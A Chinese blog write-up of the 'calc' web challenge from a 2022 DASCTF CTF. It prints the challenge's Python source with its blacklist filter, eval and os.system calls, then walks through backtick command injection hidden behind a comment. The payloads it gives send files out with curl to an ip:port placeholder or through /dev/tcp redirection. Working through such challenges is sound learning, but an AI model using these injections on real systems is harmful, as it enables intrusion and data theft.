[2022DASCTF X SU 三月春季挑战赛]calc

最新推荐文章于 2024-07-19 16:37:46 发布
最新推荐文章于 2024-07-19 16:37:46 发布
阅读量2k 收藏 1
点赞数
分类专栏: ctf 文章标签: 安全 web python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/124040420
版权

0x00 前言

比赛时几乎没看这道题
upgdstore感觉快出了就想搏一搏结果还是歇逼了…
弥补一下

0x01 brain.md

很常规的计算器在这里插入图片描述
很贴心给了源码

# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
    abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


def waf(s):
    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag



while True:
    num = input("num>>>")
    log = "echo {0} {1} {2}> /tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            print(data)
            pass

    else:
        print("waf!!")

eval处被ban了很多 但是没ban反引号
注意到下面还有个os.system(log) 可以在这执行
不熟悉的建议本地搭着先试试
python eval
https://blog.csdn.net/qq_26442553/article/details/94396532

# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
    abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


def waf(s):
    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag



while True:
    num = input("num>>>")
    log = "echo {0} {1} > /tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()),  num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except (Exception, BaseException) as e:
            print(e)
            pass

    else:
        print("waf!!")

bash直接带

root@LAPTOP-RDTNMS90:/mnt/f/工具/工具/dirsearch/dirsearch-master# echo 1+1`ls`
1+1CHANGELOG.md CONTRIBUTORS.md db default.conf dirsearch.py Dockerfile lib logs README.md reports requirements.txt

python中为避免语法错误可加上注释符#

num>>>1+1`ls`
invalid syntax (<string>, line 1)
num>>>1+1#`ls`  
num>>>

一种外带 一种直接弹回显
本质都一样

先执行 然后再外带看结果

1+1#`ls`

1+1#`curl	-X	GET	-F	xx=@tmp/log.txt	http://ip:port/`

在这里插入图片描述

1%2b1%23`cat%09T*`

在这里插入图片描述
还有一种直接弹回显 本地测试的话shell必须为bash!(zsh报错

1%2b1%23`ls>/dev/tcp/ip/port`

1%2b1%23`cat%09T*>/dev/tcp/ip/port`

回看原始命令
也就是内联执行了ls>/dev/tcp/ip/port

echo 1+1#`ls>/dev/tcp/ip/port` >/tmp/log.txt

这种情况下log.txt不会带有内联执行的结果
在这里插入图片描述

0x02 rethink

少说话多做题

k_du1t
关注
专栏目录
2022DASCTF X SU 三月春季挑战赛 checkin ROPgadget进阶使用
qq_65147345的博客
07-17 238
1. 栈迁移至bss段 2. 泄露libc地址,将setvbuf改写成puts,将rdi内容改写成read_got,从而泄露libc 3. 再次通过read函数执行system
DASCTF三月
weixin_44687621的博客
04-10 3237
DASCTF2022.3部分题目 Web ezpop 题目源码如下 <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin {
2022DASCTF X SU 三月春季挑战赛web部分
XINO
03-28 833
简单写一下
Web2022DASCTF X SU 三月春季挑战赛 题解(全)
uuzeray的博客
04-18 622
存在两个命令执行的地方,eval和system,因为waf过于严格,不考虑在eval处利用,可以注释藏恶意代码,用``在system中执行。这disable_functions让人想自杀,过于严格,甚至连不上蚁剑。再去base64解码包含一下,即可用到新的上传逻辑。先修改下上传文件逻辑,把对文件后缀的waf去掉。再回到写的webshell,putenv一下。监听,反弹shell,拿到flag。成功反弹shell,提权,拿flag。先在vps上放一个恶意sh文件。下载恶意sh文件到本地并执行。
[2022DASCTF X SU 三月春季挑战赛]easyre
最新发布
2301_80820096的博客
07-19 402
拿到附件查看一下信息32位aspack壳脱完壳后用ida打开:跟进这个函数很明显是一个base58加密,但经过验证并没用。继续跟进:最后判断条件就是让byte_492a60和v2做比较,byte_492a60就是加密后的flag往上看很容易看到加密逻辑如果知道key就能进行解密,这里我尝试了在ida中动态调试但结果会报错。我尝试使用od找key。
2022DASCTF X SU 三月春季挑战赛
qq_53263789的博客
03-30 840
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public
2022DASCTF X SU 三月春季挑战赛 web复现
akxnxbshai的博客
06-12 1028
2022DASCTF X SU 三月春季挑战赛复现一下。
2022DASCTF X SU 三月春季挑战赛 WriteUp
热门推荐
mumuzi的博客
03-27 1万+
因为这次团队协作较强,所以就把团队wp直接放了(这句话读不懂也没关系,总之放wp) 文章目录Misc月圆之夜 [mumuzi]什么奇奇怪怪的东西 [mumuzi]Hi!Hecker! [mumuzi,dota_st]问卷CryptoFlowerCipher [mumuzi,Lu1u]Reeasyre[Lu1u]IoTWhat's In The Bits[Lu1u,dota_st,mumuzi]Webezpop[atao]calc[atao]upgdstore(赛后)[atao] Misc 月圆之夜 [mu
DASCTF x SU 2022
as you know, nlp is fantasitc!
03-30 850
目录ez_pop 题calc(复现) ez_pop 题 简单的pop链分析,可以得出如下的一条链 fin:__destruct => what:__toString() => mix:fun => crow:__invoke() => fin:__call =>mix:get_flag 写poc <?php class crow{ public $v1; public $v2; } class fin{ public $f1; } class what{ pu
CIMCO Edit 2022 CNC-Calc迷你编程
06-17
CIMCO Edit 2022 CNC-Calc是一款专为数控编程设计的高效工具,它提供了迷你编程功能,便于用户快速、准确地创建和编辑G代码。CIMCO Edit 8是该软件的一个版本,其CNC-Calc模块是其核心组件之一,专门用于计算和优化...
9calc:25 x 25 = 225:check_mark_button:
05-13
9calc是一款功能齐全且能正常运行的计算器应用,它的核心特性是提供基本的数学运算,如标题中所示的“25 x 25 = 225”。这个应用的开发过程中,开发团队选择了现代化的技术栈,包括Next.js、TailwindCSS以及...
calc
03-06
在IT行业中,"calc"可能指的是CSS中的calc()函数,这是一种动态计算长度、频率、角度、时间、百分比、数值等值的工具。在HTML标签的样式设置中,calc()函数发挥着重要作用,允许开发者根据需要动态计算元素的尺寸。...
CSS3 Calc实现滚动条出现页面不跳动问题
09-24
CSS3的`calc()`函数是一种强大的工具,允许开发者在CSS中执行动态计算,以确定元素的尺寸。这个功能尤其在创建响应式和流体布局时非常有用,因为它可以根据浏览器窗口的大小和其他因素实时调整元素的宽度、高度以及...
2022DASCTF X SU三月春季挑战赛 web复现
errorr0
04-20 1572
DASCTF
2022DASCTF X SU 三月春季挑战赛 easyre
Todog的博客
04-06 594
有壳aspack,一般遇到都是upx,网上搜了aspack脱壳工具都没脱成功,使用手脱 手脱aspcak 打开od 下面使用ESP定律法进行脱壳 push压栈了,我们观察到esp中的值变红了,改动了。 在内存窗口中转到 下这个地址下硬件断点 运行软件,断到了。 接着f7 pop出栈,我们发现有个大规模跳转,应该就是oep了 调用api,是oep 准备dump一下 使用Lord Pe 先修正大小,然后dump 这个时候,我...
2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
臭nana的博客
04-03 4637
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三月春季挑战赛-p
2022DASCTF X SU 三月春季挑战赛——REVERSE——easyre
qq_39763436的博客
03-31 814
2022DASCTF X SU 三月春季挑战赛 反序列化之签到题(easyre) 1、使用ExeinfoPe工具查看一下easyre.exe的详细信息,可以看到这个程序加了一个.aspack类型的壳; 2、使用Unpacker_ASPack工具进行自动脱壳,点击Dump,进行脱壳,并另存为; 3、使用较新版本的IDA打开,按F5进行反编译,找到main()函数后,对代码进行分析; 4、这个Destination就是我们需要的,而代码中只有这个函数sub_401771(Destination)用到
2022DASCTF X SU 三月春季挑战赛checkin(栈迁移,ret2dl)
m0_51251108的博客
09-26 403
ret2dl的复习
2022DASCTF X SU 三月春季挑战赛-reverse-easyre(复现)
ookami6497的博客
04-03 900
先用PE查壳,一开始没看清楚,以为没壳,动调了半天,后来才看到是个ASP壳 用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.
Ant x D^3 CTF 挑战赛官方解析与漏洞利用
"Ant x D^3 CTF官方解答报告" 这篇PDF文件是关于一场名为Ant x D^3的网络安全竞赛(CTF:Capture The Flag)的官方解答报告,涵盖了多个技术领域,包括逆向工程、漏洞利用、Web安全、密码学以及杂项等。下面是对各...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值